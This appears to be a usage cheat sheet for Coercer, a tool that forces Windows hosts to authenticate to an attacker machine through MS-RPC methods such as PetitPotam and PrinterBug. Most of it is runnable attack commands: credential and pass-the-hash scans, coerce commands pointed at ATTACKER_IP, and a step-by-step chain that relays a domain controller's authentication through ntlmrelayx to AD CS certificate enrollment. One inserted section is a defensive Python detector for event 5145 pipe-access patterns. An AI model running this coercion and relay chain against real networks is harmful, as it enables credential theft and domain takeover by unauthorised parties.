
# Coercer

## Overview

Coercer is a tool that automates the scanning and exploitation of Windows coercion methods. It supports all known MS-RPC coercion techniques (PetitPotam, PrinterBug, DFSCoerce, ShadowCoerce, and more) in a single tool.

## Installation

```bash
pip3 install coercer

# From source
git clone https://github.com/p0dalirius/Coercer.git
cd Coercer
pip3 install .
```

## Scanning for Available Methods

```bash
# Scan a target for all available coercion methods
coercer scan -t TARGET_IP -u user -p password -d domain.local

# Scan with specific protocol filter
coercer scan -t TARGET_IP -u user -p password -d domain.local \
  --filter-protocol-name MS-EFSRPC

# Scan with NT hash
coercer scan -t TARGET_IP -u user -H NTHASH -d domain.local

# Scan multiple targets
coercer scan -t 10.10.10.0/24 -u user -p password -d domain.local
```

## Exploiting Coercion

```bash
# Coerce using all available methods
coercer coerce -t TARGET_IP -l ATTACKER_IP -u user -p password -d domain.local

# Coerce with specific method
coercer coerce -t TARGET_IP -l ATTACKER_IP -u user -p password -d domain.local \
  --filter-method-name EfsRpcOpenFileRaw

# Coerce with specific protocol
coercer coerce -t TARGET_IP -l ATTACKER_IP -u user -p password -d domain.local \
  --filter-protocol-name MS-RPRN

# WebDAV coercion (HTTP auth)
coercer coerce -t TARGET_IP -l 'ATTACKER_HOST@80/test' -u user -p password -d domain.local
```

## Supported Protocols

| Protocol | Methods | Service |
|----------|---------|---------|
| MS-EFSRPC | EfsRpcOpenFileRaw, EfsRpcEncryptFileSrv, etc. | EFS (PetitPotam) |
| MS-RPRN | RpcRemoteFindFirstPrinterChangeNotification | Print Spooler |
| MS-DFSNM | NetrDfsRemoveStdRoot, NetrDfsAddStdRoot | DFS Namespace |
| MS-FSRVP | IsPathSupported, IsPathShadowCopied | File Server VSS |
| MS-EFSR | Additional EFS methods | EFS variants |
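A defender-side counterpart to the protocol table, added here as an example and not part of Coercer or this page: it walks constructed Security event 5145 (IPC$ named-pipe access) records and flags a client that touches several of the RPC pipes these protocols are served over, which is what a scan across all methods looks like from the target's side. The pipe-to-protocol mapping and the simplified record format are assumptions of the example.

```python
import re

# Named-pipe -> protocol mapping (assumption: the usual pipe names behind the
# protocols in the table above; lsarpc is included because PetitPotam reaches
# MS-EFSRPC through it as well as through the efsrpc pipe).
PIPE_TO_PROTOCOL = {
    "efsrpc": "MS-EFSRPC",
    "lsarpc": "MS-EFSRPC",
    "spoolss": "MS-RPRN",
    "netdfs": "MS-DFSNM",
    "fssagentrpc": "MS-FSRVP",
}

# Constructed sample of Security event 5145 (detailed file share access)
# records reduced to the fields this check needs; not real captured logs.
SAMPLE_EVENTS = [
    "5145 Account=jdoe Src=10.10.10.50 Share=\\\\*\\IPC$ Target=lsarpc",
    "5145 Account=jdoe Src=10.10.10.50 Share=\\\\*\\IPC$ Target=efsrpc",
    "5145 Account=jdoe Src=10.10.10.50 Share=\\\\*\\IPC$ Target=spoolss",
    "5145 Account=jdoe Src=10.10.10.50 Share=\\\\*\\IPC$ Target=netdfs",
    "5145 Account=jdoe Src=10.10.10.50 Share=\\\\*\\IPC$ Target=FssagentRpc",
    "5145 Account=svc_backup Src=10.10.10.7 Share=\\\\*\\IPC$ Target=srvsvc",
    "5145 Account=alice Src=10.10.10.9 Share=\\\\*\\data Target=report.docx",
]

LINE_RE = re.compile(r"^5145 Account=(\S+) Src=(\S+) Share=(\S+) Target=(\S+)$")

def parse_event(line):
    """Return (account, src, share, target) or None if the line is not a 5145 record."""
    m = LINE_RE.match(line)
    return m.groups() if m else None

def coercion_candidates(lines, threshold=3):
    """Flag (account, src) pairs that opened at least `threshold` distinct
    coercion protocols over IPC$. One pipe is ordinary RPC traffic; a single
    client walking several of them in a row is the scan signature."""
    seen = {}
    for line in lines:
        parsed = parse_event(line)
        if not parsed:
            continue
        account, src, share, target = parsed
        proto = PIPE_TO_PROTOCOL.get(target.lower())
        if share.upper().endswith("IPC$") and proto:
            seen.setdefault((account, src), set()).add(proto)
    return {key: sorted(p) for key, p in seen.items() if len(p) >= threshold}
```

Real 5145 events carry the same fields (Account Name, Source Address, Share Name, Relative Target Name) as XML, so only the parser needs swapping to run this over exported logs.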

## Filtering Options

```bash
# By protocol
--filter-protocol-name MS-EFSRPC

# By method name
--filter-method-name EfsRpcOpenFileRaw

# By transport (SMB pipe or direct TCP)
--filter-transport msrpc
```

## Practical Usage Pattern

```bash
# Step 1: Scan the target
coercer scan -t DC_IP -u user -p password -d domain.local
# Review which methods are available

# Step 2: Start your relay listener
ntlmrelayx.py -t http://CA_IP/certsrv/certfnsh.asp --adcs --template DomainController -smb2support

# Step 3: Coerce
coercer coerce -t DC_IP -l ATTACKER_IP -u user -p password -d domain.local

# Step 4: Check ntlmrelayx output for successful relay
```

## Tips

1. Always scan before coercing; not all methods work on all targets
2. Use `--filter-protocol-name` to target specific methods if one doesn't work
3. For LDAP relay, use the WebDAV format: `-l 'hostname@80/test'`
4. Coercer supports Kerberos auth (`-k`) and pass-the-hash (`-H`)
5. Some methods are patched; Coercer will report which ones fail